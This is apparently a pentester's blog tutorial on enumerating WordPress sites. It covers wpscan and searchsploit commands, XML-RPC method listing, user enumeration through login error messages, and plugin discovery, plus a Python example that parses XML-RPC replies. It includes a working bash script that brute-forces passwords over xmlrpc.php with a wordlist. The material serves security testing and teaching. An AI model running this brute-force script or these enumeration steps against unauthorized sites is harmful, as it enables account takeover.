June 6, 2026
CMS enumeration: WordPress
4zer7y

After validating that a WordPress CMS is running on one of the open ports, here are some checks to perform:
1. Easy and quick: validate the WordPress version.
- If you notice that an old version is running, it is highly probable that you will find a vulnerability, maybe a simple one or maybe a critical one; it will be your mission to find out.
- You can use Exploit-DB or searchsploit to find vulnerabilities for the WordPress version you are auditing.
Example for user-enumeration vulns:

searchsploit wordpress user enumeration

Perform a full analysis using enumeration tools like wpscan, WPSeku or wordpresscan.
These tools will scan and show you a full report of what is found: version, installed plugins, the potential vulns found, etc.
wpscan --url http://127.0.0.1:31337

You can use this additional parameter to include the found users and vulnerable plugins in the report:

wpscan --url http://127.0.0.1:31337 -e vp,u

Here -e vp,u enumerates vulnerable plugins (vp) and users (u); with a list of valid users in hand, the tool can go on to brute forcing.
Finally, wpscan can give you vulnerabilities not only based on plugins; it will also report vulnerabilities found at the WordPress version level.
But for this you will need an API token, which you can only get by logging in to the WPScan online service (if you are pentesting, this may not be useful until you get valid credentials).
For password enumeration:
On the web, you can validate whether the /xmlrpc.php path is accessible:

/xmlrpc.php

This path will commonly show you a message saying "XML-RPC server accepts POST requests only".
So, we can send a POST request including an XML payload to try to find valid credentials.
Here is an interesting GitHub project where this type of exploit is documented:
GitHub - kh4sh3i/xmlrpc-exploit: Exploiting the xmlrpc.php on all WordPress versions
The first thing to try with XML-RPC is listing the existing methods:
Save the XML payload shared in the GitHub repository in a local file and send it through a POST request to the /xmlrpc.php path.
This will report the available methods.
The -d@file.xml option tells curl to read the request body from your XML file:

curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml

This will display all the available methods; one highly interesting is wp.getUsersBlogs.
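To make the XML-RPC exchange concrete, here is an added example (not code from the post or from the kh4sh3i/xmlrpc-exploit project) that builds the system.listMethods request body with Python's standard library, parses a constructed methodResponse like the one /xmlrpc.php returns, flags whether wp.getUsersBlogs is advertised, and also parses the fault reply that a wrong password produces (the same "Incorrect username or password." text the later bash script greps for). The method list and the fault values are constructed samples; a real site advertises many more methods.

```python
"""Build a system.listMethods request and parse XML-RPC replies from
/xmlrpc.php.  Added example; not from the original post."""
import xmlrpc.client

# The request body the post sends with "curl -d@file.xml": a methodCall for
# system.listMethods with no parameters, serialised by the standard library.
LIST_METHODS_REQUEST = xmlrpc.client.dumps((), methodname="system.listMethods")

# Constructed sample reply: a trimmed subset of what a real /xmlrpc.php returns.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params><param><value><array><data>
    <value><string>system.listMethods</string></value>
    <value><string>system.getCapabilities</string></value>
    <value><string>demo.sayHello</string></value>
    <value><string>wp.getUsersBlogs</string></value>
    <value><string>wp.getPosts</string></value>
  </data></array></value></param></params>
</methodResponse>
"""

# Constructed sample of the <fault> reply wp.getUsersBlogs sends for a bad
# password.  Note the transport still answers HTTP 200; the failure is only
# visible inside the XML, which is why the post's script greps the body.
SAMPLE_FAULT = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault><value><struct>
    <member><name>faultCode</name><value><int>403</int></value></member>
    <member><name>faultString</name>
      <value><string>Incorrect username or password.</string></value></member>
  </struct></value></fault>
</methodResponse>
"""

# Methods that take a username and password, so anyone who can reach them can
# test credentials without ever touching wp-login.php.
CREDENTIAL_METHODS = {"wp.getUsersBlogs"}


def parse_method_list(xml_text):
    """Return the method names carried in a system.listMethods reply.

    xmlrpc.client.loads() returns (params, methodname).  For a reply the
    params tuple holds exactly one value: the array of method names.
    A <fault> reply raises xmlrpc.client.Fault instead of returning.
    """
    params, _method = xmlrpc.client.loads(xml_text)
    (methods,) = params
    return [str(m) for m in methods]


def fault_message(xml_text):
    """faultString of a <fault> reply, or None if the reply is not a fault."""
    try:
        xmlrpc.client.loads(xml_text)
        return None
    except xmlrpc.client.Fault as err:
        return err.faultString


def exposed_credential_methods(xml_text):
    """Credential-checking methods the site advertises, sorted."""
    return sorted(m for m in parse_method_list(xml_text) if m in CREDENTIAL_METHODS)


if __name__ == "__main__":
    print("request body sent for system.listMethods:\n" + LIST_METHODS_REQUEST)
    print("methods advertised:", parse_method_list(SAMPLE_RESPONSE))
    print("credential methods exposed:", exposed_credential_methods(SAMPLE_RESPONSE))
    print("fault text in the bad-password reply:", fault_message(SAMPLE_FAULT))
```

The point for a site owner is that a non-empty exposed_credential_methods() result means password guesses can be validated over XML-RPC regardless of any protection placed on the login form, and that HTTP status codes alone will not reveal it.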
This method will help us to perform a brute-force attack through the xmlrpc file.
For this, it will be necessary to write a bash script that uses this XML method to brute force the correct password.
Here is a bash script example (USERNAME is a placeholder for the account you are testing):

#!/bin/bash
# Builds a wp.getUsersBlogs request for each candidate password and checks
# whether the reply contains the "Incorrect username or password." fault text.
# Caveat: any reply without that text (for example a fault saying XML-RPC is
# disabled) is reported as a hit, so check the response before trusting it.
function createXML(){
    password=$1
    # Replace USERNAME with the username you want to test
    xmlFile="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>USERNAME</value></param>
<param><value>$password</value></param>
</params>
</methodCall>"
    echo "$xmlFile" > file.xml
    response=$(curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml)
    if ! echo "$response" | grep -q 'Incorrect username or password.'; then
        echo -e "\n[+] La password es $password"
        exit 0
    fi
}
# Read the wordlist line by line (no pipe, so "exit 0" ends the whole script)
while read -r password; do
    createXML "$password"
done < /usr/share/wordlists/rockyou.txt

2. Are the login panels exposed and accessible?
You can try accessing one of the following paths:

/wp-login.php
/wp-admin.php

- If you can access one of these paths, you have found the gate to the system; you can try brute force or look for another vulnerability to obtain valid credentials.
Brute Force:
- You can use these panels to list existing users, because if you try to log in with a non-existing user the panel tells you that "the user is unknown", but if you try an existing user the panel shows "The password you entered for the username 'admin' is incorrect".
- Non-existing user: the user is unknown.
- Existing user: The password you entered for the username 'admin' is incorrect.
You can obtain potentially valid users by visiting the main page, where you will find the published articles. Each article carries the author's name, which commonly matches a valid username. So, before performing any brute-force attack, try to get valid usernames to save time and error logs (less noise).
3. Try to identify which plugins are installed; here you could find more vulnerabilities!
The interesting thing here is that WordPress could be installed with the latest version but still be running vulnerable plugins, so it is worth checking both ;)
Listing installed plugins:
- Try accessing the following path (if directory listing is enabled, it shows every installed plugin):

/wp-content/plugins/

- Checking the page source using curl:

curl -s -X GET "http://127.0.0.1/" | grep plugins

In the output you could find the paths of the installed plugins, including the plugin name.
Or, more advanced, filtering only the lines where the path is reported, removing the data that is not useful and reporting only unique values:

curl -s -X GET "http://127.0.0.1/" | grep -oP 'plugins/\K[^/]+' | sort -u